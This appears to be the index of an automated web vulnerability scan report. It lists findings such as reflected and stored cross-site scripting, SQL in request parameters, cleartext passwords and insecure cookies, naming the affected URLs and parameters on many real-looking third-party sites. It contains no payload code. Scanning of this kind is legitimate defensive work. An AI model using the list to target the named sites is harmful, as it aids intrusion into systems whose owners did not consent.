1.1. http://customer.kronos.com/user/managefavorites.asp [Referer HTTP header]
1.2. http://learn.shavlik.com/shavlik/index.cfm [h parameter]
1.3. http://learn.shavlik.com/shavlik/index.cfm [m parameter]
1.4. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]
1.5. http://shopping.netsuite.com/app/site/query/additemtocart.nl [NLPromocode cookie]
1.6. http://shopping.netsuite.com/app/site/query/additemtocart.nl [NLVisitorId cookie]
1.7. http://shopping.netsuite.com/app/site/query/additemtocart.nl [Submit.y parameter]
1.8. http://shopping.netsuite.com/app/site/query/additemtocart.nl [__utmz cookie]
1.10. http://shopping.netsuite.com/app/site/query/additemtocart.nl [productId parameter]
1.11. http://shopping.netsuite.com/app/site/query/additemtocart.nl [promocode parameter]
1.12. http://shopping.netsuite.com/s.nl [NLShopperId cookie]
1.13. http://shopping.netsuite.com/s.nl [__utma cookie]
1.14. http://shopping.netsuite.com/s.nl [__utmc cookie]
1.15. http://shopping.netsuite.com/s.nl [promocode cookie]
1.16. https://www.depthsecurity.com/WebResource.axd [d parameter]
1.17. https://www.depthsecurity.com/WebResource.axd [t parameter]
1.18. http://www.eset.com/us/ [PHPSESSID cookie]
1.19. http://www.trucklist.ru/cars/undefined [REST URL parameter 1]
1.20. http://www.trucklist.ru/cars/undefined [REST URL parameter 2]
1.21. http://www.trucklist.ru/favicon.ico [REST URL parameter 1]
1.22. http://www.trucklist.ru/plugins/ajax/enums.php [REST URL parameter 3]
1.24. http://www.trucklist.ru/vendors/calendar/super_calendar.js [REST URL parameter 3]
1.25. http://www.trucklist.ru/webroot/delivery/css/global.css [REST URL parameter 4]
1.26. http://www.trucklist.ru/webroot/delivery/js/global.js [REST URL parameter 4]
1.27. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js [REST URL parameter 4]
1.28. http://www.trucklist.ru/webroot/delivery/js/jquery.js [REST URL parameter 4]
1.29. http://www.trucklist.ru/webroot/delivery/js/jquery.json.js [REST URL parameter 4]
1.30. http://www.trucklist.ru/webroot/delivery/js/prototype.js [REST URL parameter 4]
1.31. http://www.trucklist.ru/webroot/delivery/js/scripts.js [REST URL parameter 4]
1.33. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alert.css [REST URL parameter 6]
1.35. http://www.trucklist.ru/webroot/delivery/js/windows/themes/default.css [REST URL parameter 6]
4. Cross-site scripting (stored)
5.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout [REST URL parameter 1]
5.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]
5.4. http://click-here-to-listen.com/players/iaPlay13.swf [REST URL parameter 1]
5.5. http://click-here-to-listen.com/players/iaPlay13.swf [REST URL parameter 2]
5.6. http://pretty.ru/favicon.ico [REST URL parameter 1]
5.7. http://www.instantengage.com/operator_status.php [on parameter]
5.8. https://www.salesforce.com/favicon.ico [REST URL parameter 1]
5.9. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]
6. Cross-site scripting (reflected)
6.1. http://ads.adxpose.com/ads/ads.js [uid parameter]
6.2. http://an.yandex.ru/code/47934 [target-ref parameter]
6.3. http://an.yandex.ru/code/57617 [target-ref parameter]
6.4. http://an.yandex.ru/code/66894 [target-ref parameter]
6.5. http://ar.voicefive.com/b/rc.pli [func parameter]
6.6. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]
6.7. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]
6.8. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f [REST URL parameter 2]
6.9. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f [REST URL parameter 3]
6.10. https://customer.kronos.com/default.asp [rurl parameter]
6.11. http://demr.opt.fimserve.com/adopt/ [sz parameter]
6.12. http://desk.opt.fimserve.com/adopt/ [sz parameter]
6.13. http://ds.addthis.com/red/psi/sites/www.kronos.com/p.json [callback parameter]
6.14. http://event.adxpose.com/event.flow [uid parameter]
6.15. https://hourly.deploy.com/hmc/report/ ['"--> parameter]
6.16. https://hourly.deploy.com/hmc/report/ [name of an arbitrarily supplied request parameter]
6.17. https://hourly.deploy.com/hmc/report/ [nsextt parameter]
6.18. https://hourly.deploy.com/hmc/report/ [register parameter]
6.19. https://hourly.deploy.com/hmc/report/index.cfm ['"--> parameter]
6.20. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]
6.21. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]
6.23. https://hourly.deploy.com/hmc/report/index.cfm [nsextt parameter]
6.24. https://hourly.deploy.com/hmc/report/index.cfm [register parameter]
6.27. http://ib.adnxs.com/ab [cnd parameter]
6.28. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard [mbox parameter]
6.29. http://kroogy.com/favicon.ico [REST URL parameter 1]
6.30. http://learn.shavlik.com/shavlik/index.cfm [h parameter]
6.31. http://learn.shavlik.com/shavlik/index.cfm [m parameter]
6.32. http://mbox5.offermatica.com/m2/netsuite/mbox/standard [mbox parameter]
6.33. http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter]
6.34. http://ok.mail.ru/cookie-token.do [client_id parameter]
6.35. http://ok.mail.ru/cookie-token.do [remove parameter]
6.36. http://pixel.fetchback.com/serve/fb/pdc [name parameter]
6.37. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [height parameter]
6.38. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [width parameter]
6.39. http://playaudiomessage.com/play.asp [f parameter]
6.40. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]
6.41. http://shopping.netsuite.com/s.nl [alias parameter]
6.42. http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]
6.43. http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]
6.44. http://shopping.netsuite.com/s.nl/c.438708/n.1/sc.3/.f [REST URL parameter 2]
6.46. http://tools.manageengine.com/forums/security-manager/forum.php [char parameter]
6.47. http://widgets.digg.com/buttons/count [url parameter]
6.48. https://www.controlscan.com/save_order.php [company parameter]
6.49. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter]
6.50. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter]
6.52. http://www.google.com/search [tch parameter]
6.53. http://www.instantengage.com/open_chat.php [Email_To parameter]
6.54. http://www.instantengage.com/open_chat.php [Page_ID parameter]
6.55. http://www.integritydefender.com/buyerDetails.php [amount parameter]
6.56. http://www.integritydefender.com/buyerDetails.php [amount parameter]
6.57. http://www.integritydefender.com/buyerDetails.php [buyerId parameter]
6.58. http://www.integritydefender.com/buyerDetails.php [item_name parameter]
6.59. http://www.integritydefender.com/buyerDetails.php [item_name parameter]
6.60. https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter]
6.61. https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter]
6.62. http://www.stillsecure.com/m/ [comments parameter]
6.63. http://www.stillsecure.com/m/ [company parameter]
6.64. http://www.stillsecure.com/m/ [email parameter]
6.65. http://www.stillsecure.com/m/ [firstName parameter]
6.66. http://www.stillsecure.com/m/ [lastName parameter]
6.67. http://www.stillsecure.com/m/ [phone parameter]
6.68. http://www.trust-guard.com/Other/ImageResizer.php [src parameter]
6.70. http://www.dmca.com/Protection/Status.aspx [Referer HTTP header]
6.71. http://www.eset.com/business/server-security/linux-file [Referer HTTP header]
6.72. http://www.eset.com/us [Referer HTTP header]
6.73. http://www.eset.com/us/ [Referer HTTP header]
6.74. http://www.eset.com/us/business/products [Referer HTTP header]
6.75. http://www.eset.com/us/business/server-security/linux-file [Referer HTTP header]
6.76. http://www.eset.com/us/home/smart-security [Referer HTTP header]
6.77. http://www.eset.com/us/store [Referer HTTP header]
6.78. http://www.eset.com/us/styles/store-new.css [Referer HTTP header]
6.79. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ [Referer HTTP header]
6.80. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
6.81. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
6.82. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
6.83. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
6.84. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]
6.85. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]
6.86. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]
6.87. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]
6.88. http://forums.manageengine.com/fbw [zdccn cookie]
6.89. http://forums.manageengine.com/fbw [zdccn cookie]
6.90. https://support.trust-guard.com/index.php [SWIFT_loginemail cookie]
6.91. https://support.trust-guard.com/visitor/index.php [SWIFT_sessionid80 cookie]
7.1. http://195.68.160.134/crossdomain.xml
7.2. http://195.68.160.166/crossdomain.xml
7.3. http://195.68.160.167/crossdomain.xml
7.4. http://195.68.160.40/crossdomain.xml
7.5. http://195.68.160.95/crossdomain.xml
7.6. http://a.vimeocdn.com/crossdomain.xml
7.7. http://ad.afy11.net/crossdomain.xml
7.8. http://ad.doubleclick.net/crossdomain.xml
7.9. http://ajax.googleapis.com/crossdomain.xml
7.10. http://api.facebook.com/crossdomain.xml
7.11. http://api.flickr.com/crossdomain.xml
7.12. http://b.voicefive.com/crossdomain.xml
7.13. http://beacon.securestudies.com/crossdomain.xml
7.14. http://bs.mail.ru/crossdomain.xml
7.15. http://bs.yandex.ru/crossdomain.xml
7.16. http://cdn-01.yumenetworks.com/crossdomain.xml
7.17. http://click-here-to-listen.com/crossdomain.xml
7.18. http://counter.rambler.ru/crossdomain.xml
7.19. http://d1.openx.org/crossdomain.xml
7.20. http://d7.zedo.com/crossdomain.xml
7.21. http://event.adxpose.com/crossdomain.xml
7.22. http://games.mochiads.com/crossdomain.xml
7.23. http://goods.adnectar.com/crossdomain.xml
7.24. http://goods43.adnectar.com/crossdomain.xml
7.25. http://img.en25.com/crossdomain.xml
7.26. http://learn.shavlik.com/crossdomain.xml
7.27. http://m.adnxs.com/crossdomain.xml
7.28. http://map.media6degrees.com/crossdomain.xml
7.29. http://mbox5.offermatica.com/crossdomain.xml
7.30. http://pda.loveplanet.ru/crossdomain.xml
7.31. http://pixel.fetchback.com/crossdomain.xml
7.32. http://pixel.quantserve.com/crossdomain.xml
7.33. http://pl.yumenetworks.com/crossdomain.xml
7.34. http://player.vimeo.com/crossdomain.xml
7.35. http://playspal.com/crossdomain.xml
7.36. http://pretty.ru/crossdomain.xml
7.37. http://r2.mail.ru/crossdomain.xml
7.38. http://rbcgaru.hit.gemius.pl/crossdomain.xml
7.39. http://rs.mail.ru/crossdomain.xml
7.40. http://s0.2mdn.net/crossdomain.xml
7.41. http://search.twitter.com/crossdomain.xml
7.42. http://widgets.fotocash.ru/crossdomain.xml
7.43. http://www.instantengage.com/crossdomain.xml
7.44. http://cache.fimservecdn.com/crossdomain.xml
7.45. http://demr.opt.fimserve.com/crossdomain.xml
7.46. http://desk.opt.fimserve.com/crossdomain.xml
7.47. http://gomail.radar.imgsmail.ru/crossdomain.xml
7.48. http://googleads.g.doubleclick.net/crossdomain.xml
7.49. http://imagesrv.gartner.com/crossdomain.xml
7.50. http://img.dt00.net/crossdomain.xml
7.51. http://img.imgsmail.ru/crossdomain.xml
7.52. http://img.mail.ru/crossdomain.xml
7.53. http://js.dt00.net/crossdomain.xml
7.54. http://mail.radar.imgsmail.ru/crossdomain.xml
7.55. http://mail.ru/crossdomain.xml
7.56. http://odnoklassniki.ru/crossdomain.xml
7.57. http://oth.dt00.net/crossdomain.xml
7.58. http://server.iad.liveperson.net/crossdomain.xml
7.59. http://www.gartner.com/crossdomain.xml
7.60. https://www.salesforce.com/crossdomain.xml
7.61. http://www.livejournal.com/crossdomain.xml
8. Silverlight cross-domain policy
8.1. http://ad.doubleclick.net/clientaccesspolicy.xml
8.2. http://b.voicefive.com/clientaccesspolicy.xml
8.3. http://beacon.securestudies.com/clientaccesspolicy.xml
8.4. http://pl.yumenetworks.com/clientaccesspolicy.xml
8.5. http://s0.2mdn.net/clientaccesspolicy.xml
9. Cleartext submission of password
9.1. http://demo.kayako.com/supportsuite/index.php
9.3. http://direct.yandex.ru/pages/direct/_direct-1303387947.js
9.5. http://my.webalta.ru/public/engine/templates.js
9.6. http://my.webalta.ru/public/engine/templates.js
9.8. http://pda.loveplanet.ru/
9.10. http://support.trust-guard.com/
9.11. http://support.trust-guard.com/index.php
9.13. http://www.integritydefender.com/account.php
9.14. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
9.15. http://www.ripoffreport.com/LoginPage.aspx
10.1. http://api.facebook.com/restserver.php [format parameter]
10.2. http://api.flickr.com/services/feeds/photos_public.gne [format parameter]
10.3. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 1]
10.4. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 2]
10.5. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 3]
10.6. http://www.netdiligence.com/xml_content/stories.xml [REST URL parameter 1]
11. SQL statement in request parameter
11.1. https://checkout.netsuite.com/core/media/media.nl
11.2. https://checkout.netsuite.com/core/styles/pagestyles.nl
11.3. https://checkout.netsuite.com/pages/portal/page_not_found.jsp
11.4. https://checkout.netsuite.com/s.nl
11.5. https://employer.unicru.com/asp/home/login.asp
11.6. https://hourly.deploy.com/hmc/report/
11.7. https://hourly.deploy.com/hmc/report/index.cfm
11.8. http://learn.shavlik.com/shavlik/index.cfm
11.9. https://secure.trust-guard.com/ResetPassword.php
11.10. https://support.trust-guard.com/index.php
11.11. https://support.trust-guard.com/visitor/index.php
12. SSL cookie without secure flag set
12.1. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl
12.2. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl
12.3. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl
12.4. https://checkout.netsuite.com/core/
12.5. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl
12.6. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl
12.7. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl
12.8. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl
12.9. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl
12.10. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl
12.11. https://checkout.netsuite.com/core/styles/pagestyles.nl
12.12. https://checkout.netsuite.com/pages/portal/css/main.css
12.13. https://checkout.netsuite.com/pages/portal/page_not_found.jsp
12.14. https://checkout.netsuite.com/s.nl
12.15. https://customer.kronos.com/Default.asp
12.16. https://employer.unicru.com/asp/home/login.asp
12.17. https://employer.unicru.com/asp/home/login.asp
12.18. https://employer.unicru.com/asp/home/login.asp
12.19. https://employer.unicru.com/asp/home/login.asp
12.20. https://hourly.deploy.com/hmc/report/
12.21. https://hourly.deploy.com/hmc/report/index.cfm
12.22. https://secure.trust-guard.com/
12.23. https://secure.trust-guard.com/ResetPassword.php
12.24. https://support.comodo.com/
12.25. https://support.trust-guard.com/
12.26. https://support.trust-guard.com/index.php
12.27. https://support.trust-guard.com/index.php
12.28. https://support.trust-guard.com/visitor/index.php
12.29. https://www.fusionvm.com/FusionVM/
12.30. https://checkout.netsuite.com/s
12.31. https://customer.kronos.com/Default.asp
12.32. https://customer.kronos.com/user/forgotpassword.asp
12.33. https://customer.kronos.com/user/forgotusername.asp
12.34. https://customer.kronos.com/user/logindenied.asp
12.35. https://support.comodo.com/index.php
12.36. https://support.comodo.com/index.php
12.37. https://support.trust-guard.com/index.php
12.38. https://support.trust-guard.com/visitor/
13.3. http://demo.kayako.com/supportsuite/visitor/index.php
13.4. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard
13.5. http://mbox5.offermatica.com/m2/netsuite/mbox/standard
13.6. http://mbox9e.offermatica.com/m2/eset/mbox/standard
13.7. http://shopping.netsuite.com/app/site/query/additemtocart.nl
13.8. http://shopping.netsuite.com/s.nl
13.9. https://support.trust-guard.com/visitor/index.php
13.10. http://www.removeyourname.com/js/myEdgeProFormWidget.js
13.11. http://www.supportskins.com/support/visitor/index.php
14. Password field submitted using GET method
14.1. http://direct.yandex.ru/pages/direct/_direct-1303387947.js
14.2. https://hourly.deploy.com/hmc/report/
14.3. https://hourly.deploy.com/hmc/report/index.cfm
14.4. http://my.webalta.ru/public/engine/templates.js
14.5. http://my.webalta.ru/public/engine/templates.js
15.1. http://ad.trafficmp.com/a/bpix [r parameter]
15.3. http://www.instantengage.com/operator_status.php [on parameter]
15.4. https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter]
16. Cookie scoped to parent domain
16.1. http://sorry.google.com/sorry/Captcha
16.2. http://www.elineaccessories.com/
16.3. http://www.gartner.com/technology/contact/contact_gartner.jsp
16.4. http://www.internetreputationmanagement.com/
16.5. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/images/bg-tab.gif
16.7. http://www.trucklist.ru/cars/trucks
16.9. http://ad.amgdgt.com/ads/
16.10. http://ad.trafficmp.com/a/bpix
16.11. http://ad.trafficmp.com/a/bpix
16.12. http://ad.trafficmp.com/a/bpix
16.13. http://ar.voicefive.com/b/wc_beacon.pli
16.14. http://ar.voicefive.com/bmx3/broker.pli
16.15. http://b.scorecardresearch.com/b
16.16. http://b.scorecardresearch.com/p
16.17. http://b.voicefive.com/b
16.19. http://core1.node15.top.mail.ru/counter
16.20. http://core1.node15.top.mail.ru/counter
16.21. http://core2.node12.top.mail.ru/counter
16.22. http://counter.rambler.ru/top100.cnt
16.23. http://counter.yadro.ru/hit
16.24. http://d7.zedo.com/img/bh.gif
16.25. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter
16.26. http://goods.adnectar.com/analytics/get_avia_js
16.28. http://ib.adnxs.com/pxj
16.29. http://id.google.com/verify/EAAAADz5CbNokYbOxZux8yNUhyk.gif
16.30. http://id.google.com/verify/EAAAAP8sqKb20XMZzt0hJR6mFcY.gif
16.31. http://idcs.interclick.com/Segment.aspx
16.32. http://l.azjmp.com/f.php
16.33. http://m.adnxs.com/msftcookiehandler
16.34. http://map.media6degrees.com/orbserv/aopix
16.35. http://mc.yandex.ru/watch/57617
16.36. http://pixel.fetchback.com/serve/fb/pdc
16.37. http://pixel.quantserve.com/pixel
16.38. http://pixel.rubiconproject.com/tap.php
16.39. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil
16.40. http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif
16.41. http://pogoda.webalta.ru/
16.42. http://r2.mail.ru/b12179277.gif
16.43. http://r2.mail.ru/b12179279.gif
16.44. http://r2.mail.ru/b12179280.gif
16.45. http://r2.mail.ru/b12201458.png
16.46. http://r2.mail.ru/b12526055.gif
16.47. http://r2.mail.ru/b12526056.jpg
16.48. http://r2.mail.ru/b12526057.jpg
16.49. http://r2.mail.ru/b12526058.jpg
16.50. http://r2.mail.ru/b12526059.jpg
16.51. http://r2.mail.ru/b12526060.jpg
16.52. http://r2.mail.ru/b12526061.jpg
16.53. http://r2.mail.ru/b12526062.jpg
16.54. http://r2.mail.ru/b12526063.jpg
16.55. http://r2.mail.ru/b12526064.jpg
16.56. http://r2.mail.ru/b12526065.gif
16.57. http://r2.mail.ru/b12526191.gif
16.58. http://r2.mail.ru/b12526192.gif
16.59. http://r2.mail.ru/b12526193.gif
16.60. http://r2.mail.ru/b12526194.gif
16.61. http://r2.mail.ru/b12526208.gif
16.62. http://r2.mail.ru/b12526210.gif
16.63. http://r2.mail.ru/b12527647.gif
16.64. http://r2.mail.ru/b12529050.jpg
16.65. http://r2.mail.ru/b12530142.jpg
16.66. http://r2.mail.ru/b12530159.jpg
16.67. http://r2.mail.ru/b12531249.jpg
16.68. http://r2.mail.ru/b12531545.jpg
16.69. http://r2.mail.ru/b12531624.jpg
16.70. http://r2.mail.ru/b12532203.jpg
16.71. http://r2.mail.ru/b12752186.jpg
16.72. http://r2.mail.ru/b12752583.jpg
16.73. http://r2.mail.ru/b12752584.jpg
16.74. http://r2.mail.ru/b12752585.jpg
16.75. http://r2.mail.ru/b12752586.jpg
16.76. http://r2.mail.ru/b12855502.png
16.77. http://r2.mail.ru/b12887675.jpg
16.78. http://r2.mail.ru/b12887676.jpg
16.79. http://r2.mail.ru/b12887677.jpg
16.80. http://r2.mail.ru/b12961140.jpg
16.81. http://r2.mail.ru/b12961154.jpg
16.82. http://r2.mail.ru/b12961373.jpg
16.83. http://r2.mail.ru/b12962356.jpg
16.84. http://r2.mail.ru/b12963308.jpg
16.85. http://r2.mail.ru/b12965362.jpg
16.86. http://r2.mail.ru/b12968616.jpg
16.87. http://r2.mail.ru/b12979027.jpg
16.88. http://r2.mail.ru/b13039712.jpg
16.89. http://r2.mail.ru/b13044176.jpg
16.90. http://r2.mail.ru/b13049054.jpg
16.91. http://r2.mail.ru/b13050852.jpg
16.92. http://r2.mail.ru/b13057590.swf
16.93. http://r2.mail.ru/b13058787.jpg
16.94. http://r2.mail.ru/b13058840.jpg
16.95. http://r2.mail.ru/b13058851.jpg
16.96. http://r2.mail.ru/b13058852.jpg
16.97. http://r2.mail.ru/b13058968.jpg
16.98. http://r2.mail.ru/b13059223.jpg
16.99. http://r2.mail.ru/b13059860.jpg
16.100. http://r2.mail.ru/b13060405.jpg
16.101. http://r2.mail.ru/b13060487.jpg
16.102. http://r2.mail.ru/b13061099.jpg
16.103. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif
16.104. http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif
16.105. http://segment-pixel.invitemedia.com/pixel
16.106. http://server.iad.liveperson.net/hc/48536788/
16.107. http://sorry.google.com/sorry/
16.108. http://storage.trafic.ro/js/trafic.js
16.109. http://top5.mail.ru/counter
16.110. http://www.kayako.com/
16.111. http://www.kayako.com/styles/
16.112. http://www.kayako.com/styles/graphics/loader.white.gif
16.113. http://www.livejournal.com/tools/endpoints/journalspotlight.bml
16.114. http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388
17. Cookie without HttpOnly flag set
17.1. http://173.46.7.45/SightMaxAgentInterface/Monitor.smjs
17.2. http://ads.adxpose.com/ads/ads.js
17.3. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl
17.4. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl
17.5. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl
17.6. https://checkout.netsuite.com/core/
17.7. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl
17.8. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl
17.9. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl
17.10. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl
17.11. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl
17.12. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl
17.13. https://checkout.netsuite.com/core/styles/pagestyles.nl
17.14. https://checkout.netsuite.com/pages/portal/css/main.css
17.15. https://checkout.netsuite.com/pages/portal/page_not_found.jsp
17.16. https://checkout.netsuite.com/s.nl
17.17. http://customer.kronos.com/
17.18. http://customer.kronos.com/user/managefavorites.asp
17.19. https://customer.kronos.com/Default.asp
17.20. http://demo.kayako.com/supportsuite/index.php
17.21. http://demo.kayako.com/supportsuite/visitor/index.php
17.22. https://employer.unicru.com/asp/home/login.asp
17.23. https://employer.unicru.com/asp/home/login.asp
17.24. https://employer.unicru.com/asp/home/login.asp
17.25. https://employer.unicru.com/asp/home/login.asp
17.26. http://event.adxpose.com/event.flow
17.27. http://hostpapasupport.com/
17.28. https://hourly.deploy.com/hmc/report/
17.29. https://hourly.deploy.com/hmc/report/index.cfm
17.30. http://partner-support.wiki.zoho.com/
17.31. http://partners.criticalwatch.com/
17.32. http://playaudiomessage.com/play.asp
17.33. https://secure.trust-guard.com/
17.34. https://secure.trust-guard.com/ResetPassword.php
17.35. http://shopping.netsuite.com/app/site/hit/tracker.nl
17.36. http://shopping.netsuite.com/app/site/query/additemtocart.nl
17.37. http://shopping.netsuite.com/core/styles/pagestyles.nl
17.38. http://shopping.netsuite.com/s.nl
17.39. http://sorry.google.com/sorry/Captcha
17.40. https://support.comodo.com/
17.41. https://support.trust-guard.com/
17.42. https://support.trust-guard.com/index.php
17.43. https://support.trust-guard.com/index.php
17.44. https://support.trust-guard.com/visitor/index.php
17.45. http://t5.trackalyzer.com/trackalyze.asp
17.46. http://tengrinews.kz/tag/891/
17.47. http://www.customermagnetism.com/
17.48. http://www.fusionvm.com/
17.49. http://www.gartner.com/technology/contact/contact_gartner.jsp
17.50. http://www.integritydefender.com/
17.51. http://www.internetreputationmanagement.com/
17.52. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/images/bg-tab.gif
17.54. http://www.iveco-ptc.spb.ru/
17.55. http://www.netsuite.com/app/site/hit/tracker.nl
17.56. http://www.smpone.com/images/captcha.php
17.57. http://www.supportskins.com/support/visitor/index.php
17.58. http://www.tresware.com/images/captcha.php
17.59. http://www.trucklist.ru/cars/trucks
17.60. http://www.trust-guard.com/
17.61. http://www.trust-guard.com/PCI-scanning-s/39.htm
17.63. http://ad.amgdgt.com/ads/
17.64. http://ad.trafficmp.com/a/bpix
17.65. http://ad.trafficmp.com/a/bpix
17.66. http://ad.trafficmp.com/a/bpix
17.67. http://ad.yieldmanager.com/pixel
17.68. http://an.yandex.ru/code/47934
17.69. http://an.yandex.ru/code/57617
17.70. http://an.yandex.ru/code/66894
17.71. http://ar.voicefive.com/b/wc_beacon.pli
17.72. http://ar.voicefive.com/bmx3/broker.pli
17.73. http://b.dclick.ru/image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554
17.74. http://b.scorecardresearch.com/b
17.75. http://b.scorecardresearch.com/p
17.76. http://b.voicefive.com/b
17.78. http://bw.pronto.ru/brick/5/167/36/30/125/&rnd=538045407
17.79. http://bw.pronto.ru/brick/5/167/36/30/24/&rnd=252896795
17.80. http://bw.pronto.ru/brick/5/167/36/30/26/&rnd=556115021
17.81. http://bw.pronto.ru/brick/5/167/36/30/28/&rnd=128924368
17.82. http://bw.pronto.ru/brick/5/167/36/30/29/&rnd=443104168
17.83. http://bw.pronto.ru/brick/5/167/36/30/37/&rnd=179025170
17.84. http://bw.pronto.ru/brick/5/167/36/30/44/&rnd=3108367
17.85. http://bw.pronto.ru/brickgrid/5/167/36/30/138/29/&rnd=808462191
17.86. http://bw.pronto.ru/brickgrid/5/167/36/30/236/49/&rnd=44849087
17.87. http://bw.pronto.ru/brickgrid/5/167/36/30/30/15/&rnd=555318316
17.88. http://bw.pronto.ru/brickgrid/5/167/36/30/31/16/&rnd=189356183
17.89. https://checkout.netsuite.com/s
17.90. http://core1.node15.top.mail.ru/counter
17.91. http://core1.node15.top.mail.ru/counter
17.92. http://core2.node12.top.mail.ru/counter
17.93. http://count.rbc.ru/p712.gif
17.94. http://counter.hitslink.com/statistics.asp
17.95. http://counter.rambler.ru/top100.cnt
17.96. http://counter.yadro.ru/hit
17.97. https://customer.kronos.com/Default.asp
17.98. https://customer.kronos.com/user/forgotpassword.asp
17.99. https://customer.kronos.com/user/forgotusername.asp
17.100. https://customer.kronos.com/user/logindenied.asp
17.101. http://d1.openx.org/ajs.php
17.102. http://d1.openx.org/lg.php
17.103. http://d7.zedo.com/img/bh.gif
17.104. http://demo.kayako.com/supportsuite/index.php
17.105. http://demr.opt.fimserve.com/adopt/
17.106. http://desk.opt.fimserve.com/adopt/
17.107. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter
17.108. http://goods.adnectar.com/analytics/get_avia_js
17.109. http://hostpapasupport.com/index.php
17.110. http://idcs.interclick.com/Segment.aspx
17.111. http://ideco-software.ru/products/ims/
17.112. http://imagesrv.gartner.com/cio/css/main.css
17.113. http://imagesrv.gartner.com/js/utility_tech.js
17.114. http://kronos.d1.sc.omtrdc.net/b/ss/kronos-dev/1/H.22.1/s64896461574826
17.115. http://l.azjmp.com/f.php
17.117. http://map.media6degrees.com/orbserv/aopix
17.118. http://mc.yandex.ru/watch/57617
17.119. http://pda.loveplanet.ru/
17.120. http://pixel.fetchback.com/serve/fb/pdc
17.121. http://pixel.quantserve.com/pixel
17.122. http://pixel.rubiconproject.com/tap.php
17.123. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil
17.125. http://pogoda.webalta.ru/
17.127. http://r2.mail.ru/b12179277.gif
17.128. http://r2.mail.ru/b12179279.gif
17.129. http://r2.mail.ru/b12179280.gif
17.130. http://r2.mail.ru/b12201458.png
17.131. http://r2.mail.ru/b12526055.gif
17.132. http://r2.mail.ru/b12526056.jpg
17.133. http://r2.mail.ru/b12526057.jpg
17.134. http://r2.mail.ru/b12526058.jpg
17.135. http://r2.mail.ru/b12526059.jpg
17.136. http://r2.mail.ru/b12526060.jpg
17.137. http://r2.mail.ru/b12526061.jpg
17.138. http://r2.mail.ru/b12526062.jpg
17.139. http://r2.mail.ru/b12526063.jpg
17.140. http://r2.mail.ru/b12526064.jpg
17.141. http://r2.mail.ru/b12526065.gif
